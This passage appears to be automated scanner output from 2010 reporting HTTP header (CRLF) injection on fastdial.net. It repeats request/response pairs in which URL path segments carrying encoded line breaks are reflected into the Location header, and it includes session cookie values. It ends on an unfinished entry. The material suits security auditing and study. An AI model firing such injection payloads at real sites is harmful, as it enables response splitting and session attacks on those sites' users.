GET /static/12ce8%0d%0aa58894ca991/common/scripts/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:53 GMT Server: Apache Location: http://fastdial.net/static/12ce8 a58894ca991/common/scripts/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload a54d6%0d%0a1f07e84d25 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/a54d6%0d%0a1f07e84d25/scripts/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:08 GMT Server: Apache Location: http://fastdial.net/static/images/a54d6 1f07e84d25/scripts/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 3e67c%0d%0a22f4c103a11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/3e67c%0d%0a22f4c103a11/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:23 GMT Server: Apache Location: http://fastdial.net/static/images/common/3e67c 22f4c103a11/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 38cb8%0d%0a76c6d1b5de6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/38cb8%0d%0a76c6d1b5de6/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:34 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/38cb8 76c6d1b5de6/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 9b0e6%0d%0a39272b3c51f was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/images/9b0e6%0d%0a39272b3c51f/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:54 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/images/9b0e6 39272b3c51f/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 70310%0d%0a65ef1dca2da was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /70310%0d%0a65ef1dca2da/images/common/scripts/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:57 GMT Server: Apache Location: http://fastdial.net/70310 65ef1dca2da/images/common/scripts/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 6980a%0d%0a360681fb3a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/6980a%0d%0a360681fb3a0/common/scripts/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:24 GMT Server: Apache Location: http://fastdial.net/static/6980a 360681fb3a0/common/scripts/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload dd374%0d%0a3c5d884fc86 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/dd374%0d%0a3c5d884fc86/scripts/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:35 GMT Server: Apache Location: http://fastdial.net/static/images/dd374 3c5d884fc86/scripts/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload fd6fc%0d%0aad7082e75b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/fd6fc%0d%0aad7082e75b/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:54 GMT Server: Apache Location: http://fastdial.net/static/images/common/fd6fc ad7082e75b/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload f8a5d%0d%0ace130526622 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/f8a5d%0d%0ace130526622/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:09 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/f8a5d ce130526622/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload f7c4b%0d%0a18a3914ca75 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f7c4b%0d%0a18a3914ca75/images/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:52:34 GMT Server: Apache Location: http://fastdial.net/f7c4b 18a3914ca75/images/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 7f200%0d%0abc7793d6858 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/7f200%0d%0abc7793d6858/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:52:47 GMT Server: Apache Location: http://fastdial.net/static/7f200 bc7793d6858/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload bfcd9%0d%0a3ed71c0b4b2 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/bfcd9%0d%0a3ed71c0b4b2/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:06 GMT Server: Apache Location: http://fastdial.net/static/images/bfcd9 3ed71c0b4b2/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload eeadc%0d%0a2e090a3b52f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/eeadc%0d%0a2e090a3b52f/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:19 GMT Server: Apache Location: http://fastdial.net/static/images/common/eeadc 2e090a3b52f/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload be9d3%0d%0a8b91b6e3205 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /be9d3%0d%0a8b91b6e3205/images/common/scripts/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:00 GMT Server: Apache Location: http://fastdial.net/be9d3 8b91b6e3205/images/common/scripts/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload f163c%0d%0a954c0781a38 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/f163c%0d%0a954c0781a38/common/scripts/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:12 GMT Server: Apache Location: http://fastdial.net/static/f163c 954c0781a38/common/scripts/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 86b4c%0d%0aa9d5d005337 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/86b4c%0d%0aa9d5d005337/scripts/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:29 GMT Server: Apache Location: http://fastdial.net/static/images/86b4c a9d5d005337/scripts/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 80a5e%0d%0adc4671f86d7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/80a5e%0d%0adc4671f86d7/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:41 GMT Server: Apache Location: http://fastdial.net/static/images/common/80a5e dc4671f86d7/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 637fd%0d%0a58be4e01ef6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/637fd%0d%0a58be4e01ef6/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:18 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/637fd 58be4e01ef6/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 4eff1%0d%0a86d5a0733ca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4eff1%0d%0a86d5a0733ca/images/common/scripts/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:19 GMT Server: Apache Location: http://fastdial.net/4eff1 86d5a0733ca/images/common/scripts/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload aada7%0d%0a48d55c04006 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/aada7%0d%0a48d55c04006/common/scripts/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:36 GMT Server: Apache Location: http://fastdial.net/static/aada7 48d55c04006/common/scripts/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload fae4c%0d%0a388e0eea44 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/fae4c%0d%0a388e0eea44/scripts/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:50 GMT Server: Apache Location: http://fastdial.net/static/images/fae4c 388e0eea44/scripts/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload e13d2%0d%0a40991712265 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/e13d2%0d%0a40991712265/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:03 GMT Server: Apache Location: http://fastdial.net/static/images/common/e13d2 40991712265/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload e079e%0d%0a83f5da4bb4d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/e079e%0d%0a83f5da4bb4d/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:21 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/e079e 83f5da4bb4d/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload ba4b1%0d%0aba127151dc8 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/styles/ba4b1%0d%0aba127151dc8/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:35 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/styles/ba4b1 ba127151dc8/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 4f3a6%0d%0aa9af32fb61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4f3a6%0d%0aa9af32fb61/images/common/scripts/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:47 GMT Server: Apache Location: http://fastdial.net/4f3a6 a9af32fb61/images/common/scripts/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 456e5%0d%0a72a2edd5fcb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/456e5%0d%0a72a2edd5fcb/common/scripts/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:06 GMT Server: Apache Location: http://fastdial.net/static/456e5 72a2edd5fcb/common/scripts/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 1f4b3%0d%0a65aa6488a28 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/1f4b3%0d%0a65aa6488a28/scripts/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:21 GMT Server: Apache Location: http://fastdial.net/static/images/1f4b3 65aa6488a28/scripts/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 7ef97%0d%0a4c85cfee287 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/7ef97%0d%0a4c85cfee287/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:46:32 GMT Server: Apache Location: http://fastdial.net/static/images/common/7ef97 4c85cfee287/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 48f98%0d%0afe0fb131cd9 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/scripts/48f98%0d%0afe0fb131cd9/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:47:18 GMT Server: Apache Location: http://fastdial.net/static/images/common/scripts/48f98 fe0fb131cd9/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload f4c64%0d%0a516e26cfeec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f4c64%0d%0a516e26cfeec/images/common/styles/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:43 GMT Server: Apache Location: http://fastdial.net/f4c64 516e26cfeec/images/common/styles/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 2 is copied into the Location response header. The payload 9a0ec%0d%0a3dbcd7839e3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/9a0ec%0d%0a3dbcd7839e3/common/styles/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:40:57 GMT Server: Apache Location: http://fastdial.net/static/9a0ec 3dbcd7839e3/common/styles/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 3 is copied into the Location response header. The payload e931b%0d%0a6479fd1a8f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/e931b%0d%0a6479fd1a8f/styles/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:13 GMT Server: Apache Location: http://fastdial.net/static/images/e931b 6479fd1a8f/styles/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 4 is copied into the Location response header. The payload b631b%0d%0afcaf6d229a7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/b631b%0d%0afcaf6d229a7/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:29 GMT Server: Apache Location: http://fastdial.net/static/images/common/b631b fcaf6d229a7/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 5 is copied into the Location response header. The payload 58190%0d%0a8ff5ac22d1 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/58190%0d%0a8ff5ac22d1/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:41:49 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/58190 8ff5ac22d1/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 6 is copied into the Location response header. The payload c8330%0d%0a3d56ef6f097 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/c8330%0d%0a3d56ef6f097/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:04 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/c8330 3d56ef6f097/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 7 is copied into the Location response header. The payload 939f3%0d%0a727061306f9 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/common/images/939f3%0d%0a727061306f9/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:17 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/common/images/939f3 727061306f9/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 1 is copied into the Location response header. The payload 2067f%0d%0ac3a6dc9999c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
